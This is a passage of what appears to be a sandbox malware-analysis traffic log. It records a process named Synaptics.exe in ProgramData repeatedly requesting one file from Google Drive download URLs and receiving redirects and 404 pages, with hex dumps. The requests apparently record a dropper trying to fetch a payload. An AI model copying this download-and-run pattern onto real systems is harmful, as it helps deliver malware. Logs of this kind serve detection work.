                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-j9LLhnrI7U8ePWgYZIRIWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.2.449844142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5hFky1yJTkzUWlYwycdSJ4q_AJOFStBp2NDlI1Afvj8tE_DM1oKs0REEmFW9fpQWrZ
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Pvaf9J0qMGQ5ZqWdxqj4nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 6a 6c 78 6f 4b 6b 6b 4e 75 43 37 6b 31 55 35 74 6a 4e 33 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="VjlxoKkkNuC7k1U5tjN3hw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.2.449846142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7G8SdNediIpT0W-01uWdxkxqCWE7_sr1ysxIQ2G5Xjp_9jicON_K65UQZ1PuWWcMXA
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-C2nWOD6b96qt89Z-xGnMYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4e 5f 2d 6e 62 34 6a 41 5f 4e 5a 30 54 46 31 47 57 66 4a 35 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="JN_-nb4jA_NZ0TF1GWfJ5A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.2.449847142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tpMtZ0O6PMKIM02eFD5LJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.2.449849142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rKneUWVaJ7Qa-zVgKKg4NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.2.449850142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC52rF_xx1KBvR42FAZ2To7lJHC1zJSPO3e0RZU5b_3nJKySWEdZIdMgducHTGvu0fR1
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YLzlh8RQMOKfdJbWLTZTPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 70 32 62 54 4f 39 48 58 71 4e 78 71 38 6b 75 4a 6b 67 2d 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="tp2bTO9HXqNxq8kuJkg-Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              68192.168.2.449851142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0LFq_Rp07UWa-Pbz1yIsEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.2.449852142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:21 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7ZzpH_PRKwm7S3U1Q3VBOPTVlCdsxAaQzutyrdsDbnuVgaIduMLL2YW3SGzNh_24OZE4GfK7E
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--Y_TkK58AyWWG510jGnlrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
